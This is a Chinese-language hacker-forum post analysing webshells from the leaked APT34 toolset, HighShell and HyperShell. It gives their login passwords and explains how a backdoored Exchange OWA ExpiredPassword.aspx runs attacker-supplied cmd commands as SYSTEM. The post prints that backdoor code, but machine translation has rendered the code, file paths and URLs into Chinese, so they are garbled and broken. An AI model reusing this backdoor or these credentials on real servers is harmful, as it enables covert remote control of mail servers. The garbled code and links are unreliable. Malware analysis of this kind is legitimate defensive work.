跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

对APT34泄露工具的分析——高壳和超级外壳


Xiao7

推荐的帖子

0x00 前言

最近APT34的6款工具被泄露,本文作为分析文章的第二篇,仅在技术角度对其中的高壳和超级外壳进行分析

参考资料:

https://malware-research.org/apt34-hacking-tools-leak/amp/

0x01 简介

本文将要介绍以下内容:

对高壳的分析

对超级外壳的分析

小结

0x02 对HighShell的分析

对应泄露文件的名称为Webshells _和_面板中的高壳

其中的文件为HighShell.aspx,是针对Windows操作系统操作系统服务器的webshell

默认访问页面如下图

2-1.png

注册框为红色,需要输入连接口令

正确的口令为Th!sN0tF0rFAN

输入正确的口令后,点击动手吧,刷新页面,成功登录,如下图

2-2.png

注册框变为绿色

该工具的公开线索:

https://号42单元。帕洛阿尔托网络。com/unit 42-双面-web shell-持久-接入点-横向-移动/

高壳同帕洛阿尔托网络在文中提到的双面的页面相同

0x03 对HyperShell的分析

对应泄露文件的名称为Webshells _和_面板中的超级外壳

下面包含七个文件夹:

ExpiredPasswordTech

超级外壳

图像

图书馆

包装

ShellLocal

稳定版本

1.ExpiredPasswordTech

包括3个文件:

error4.aspx,功能与HighShell.aspx相同,但登录口令未知

ExpiredPassword.aspx,适用于交换的webshell

MyMaster.aspx,生成字符串:NxKK7a

2.HyperShell

包含多个文件,是各个webshell的源码文件

其中包含另一个可用的webshell,相对路径:\ web Shell _ and _ Panel \ HyperShell \ HyperShell \ Shell \ simple。aspx

连接口令:MkRg5dm8MOk

如下图

2-3.png

3.Image

图片文件夹

4.Libraries

包含多个依赖文件

5.packages

包含多个依赖文件

6. ShellLocal

空文件夹

7. StableVersion

稳定版本,包含多个webshell

(1)ExpiredPassword.aspx

适用于交换的webshell

相对路径:\ web shell _ and _ Panel \ HyperShell \稳定版\ high shell v 5.0 \ HyperShell \ HyperShell \ ExpiredPasswordTech

与相对路径. web shell _ and _ Panel \ HyperShell \ ExpiredPasswordTech下的文件内容相同

ExpiredPassword.aspx是交换正常的功能,对应重置用户口令的页面,如下图

3-1.png

访问的网址:https:///OWA/认证/过期密码。aspx

对应Windows操作系统操作系统绝对路径:C:\ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ http proxy \ OWA \ auth \ expired password。aspx

该路径下的webshell默认权限为系统

我的测试系统安装了Exchange2013,正常的ExpiredPassword.aspx源码我已经上传至github:

https://生的。githubusercontent。com/3g学生/测试/硕士/过期密码。aspx(2013年)

超级外壳中的ExpiredPassword.aspx是一个添加了后门代码的文件,同我测试环境的正常ExpiredPassword.aspx文件相比有多处不同,如下图

3-2.png

经过分析发现有可能是交换版本差异导致的,忽略版本差异,HyperShell中的ExpiredPassword.aspx主要添加了如下代码:

%

尝试{

如果(转换ToBase64String(新系统安全。密码学。sha1管理().计算机哈希(编码ASCII码。GetBytes(编码ASCII。GetString(转换FromBase64String(请求. form[' new pwd 1 '])' red Gea @ #!% FS ')))==' s6kos 9d/etq1cd///fgTarVnUQ=')

{

系统。诊断。过程p=新系统诊断。process();

系统诊断。process StartInfo I=p . StartInfo

文件名=' cmd

i.Arguments='/c '编码10 . UTF8。GetString(转换FromBase64String(请求. form[' new pwd 2 ']);

i . UseShellExecute=false

i . CreateNoWindow=true

i . RedirectStandardOutput=true

页(第页的缩写)start();

字符串r=p .标准输出。readtoend();

页(第页的缩写)wait for exit();

页(第页的缩写)close();

回应。写(')服务器. html encode(r)" ";

回应. end();

} }抓住{}

%

对应到我的测试环境,也就是Exchange2013,添加有效载荷后并去掉验证环节的代码已上传至github:

https://生的。githubusercontent。com/3g学生/测试/硕士/过期密码。aspx(2013)(超壳)

确认新密码项为传入要执行的命令,权限为系统

(2)HighShellLocal

功能强大的webshell

相对路径:\ web shell _ and _ Panel \ web shell _ and _ Panel \ HyperShell \稳定版\高壳v 5.0 \ HyperShell \ HyperShell \ shell local \稳定版\ shell local-v 8。8 .5 .rar

解压到当前目录,相对路径为\ shell local-v 8。8 .5 \ shell local-v 8。8 .5 \ HighShellLocal,包括以下文件:

文件夹钢性铸铁

文件夹文件

文件夹射流研究…

HighShellLocal.aspx

实际使用时,还需要\ shell local-v 8。8 .5 \ shell local-v 8。8 .5 \下的箱子文件夹,否则提示无法使用Json

完整结构如下:

HighShellLocal.aspx

bin

Newtonsoft .Json.dll

css

main.css

img

box-zipper.png

download-cloud.png

exclamation-diamond.png

heart-break.png

heart-empty.png

heart.png

minus-button.png

files

7za.exe

nbt.exe

rx.exe

js

explorer.js

main.js

send.js

效用。射流研究…

components

jquery

semantic

登录口令:Th!sN0tF0rFAN

登录页面如下图

3-4.png

输入正确的登录口令后,如下图

3-5.png

可以看到该webshell支持多个功能

0x04 小结

本文对泄露文件中的高壳和超级外壳进行了分析,其中超级外壳中的ExpiredPassword.aspx是一个比较隐蔽的webshell,目前为止我还未在公开资料中找到这种利用方法。

留下回复

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...